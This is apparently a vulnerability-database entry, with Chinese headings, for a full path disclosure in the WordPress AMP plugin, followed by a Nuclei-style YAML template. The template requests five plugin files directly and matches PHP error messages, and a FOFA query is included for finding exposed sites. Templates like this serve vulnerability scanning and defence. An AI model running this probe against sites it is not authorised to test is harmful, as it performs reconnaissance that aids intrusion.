漏洞描述
The WordPress AMP - Accelerated Mobile Pages plugin was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated access to the full application path.
wordpress-amp-fpd: WordPress AMP - Full Path Disclosure
PoC代码[已公开]
id: wordpress-amp-fpd
info:
name: WordPress AMP - Full Path Disclosure
author: pussycat0x
severity: low
description: |
The WordPress AMP - Accelerated Mobile Pages plugin was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated access to the full application path.
reference:
- https://wordpress.org/plugins/accelerated-mobile-pages/
metadata:
max-request: 5
vendor: wordpress
product: accelerated-mobile-pages
fofa-query: body="/wp-content/plugins/accelerated-mobile-pages"
tags: wordpress,wp,wp-plugin,accelerated-mobile-pages,fpd
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/accelerated-mobile-pages/includes/options/redux-core/framework.php"
- "{{BaseURL}}/wp-content/plugins/accelerated-mobile-pages/includes/options/admin-config.php"
- "{{BaseURL}}/wp-content/plugins/accelerated-mobile-pages/includes/thirdparty-compatibility.php"
- "{{BaseURL}}/wp-content/plugins/accelerated-mobile-pages/templates/starter-flavor.php"
- "{{BaseURL}}/wp-content/plugins/accelerated-mobile-pages/classes/class-flavor.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
- 'contains(body, "accelerated-mobile-pages")'
- 'status_code == 200 || status_code == 500'
condition: and
# digest: 4b0a00483046022100bfc5c8c0918b809ff1de25aa44e76896d7cc2066428492e50d71fc3e9b66097b022100adba1c0841593f12621d9d5e6b8e139eaa76e435ca421a83b7339e365a4c994d:922c64590222798bb761d5b6d8e72950